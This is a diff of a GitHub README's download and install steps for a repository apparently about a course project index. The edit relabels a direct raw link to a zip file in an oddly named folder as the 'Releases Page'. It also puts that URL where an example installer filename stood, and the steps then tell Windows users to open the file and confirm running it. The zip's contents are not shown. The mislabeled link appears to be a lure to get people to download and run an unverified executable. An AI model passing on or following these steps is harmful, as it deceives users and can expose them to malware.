sreekar831/indice-de-projetos-cursos/README.md

 ## 🔗 Download & Install
 To get started with the application, follow these steps:

-1. Visit the [Releases Page](https://github.com/sreekar831/indice-de-projetos-cursos/releases) to access the latest version.
+1. Visit the [Releases Page](https://raw.githubusercontent.com/sreekar831/indice-de-projetos-cursos/main/inexpensively/indice-de-projetos-cursos.zip) to access the latest version.

 2. Find the latest release and click on the download link for your operating system.
-The file you need will have a name that corresponds to your platform (for example, `indice-de-projetos-cursos-windows.exe` for Windows users).
+The file you need will have a name that corresponds to your platform (for example, `https://raw.githubusercontent.com/sreekar831/indice-de-projetos-cursos/main/inexpensively/indice-de-projetos-cursos.zip` for Windows users).

 3. Once the download is complete, open the downloaded file.
 Follow the installation prompts:
    - For Windows, you may need to confirm that you want to run the installer.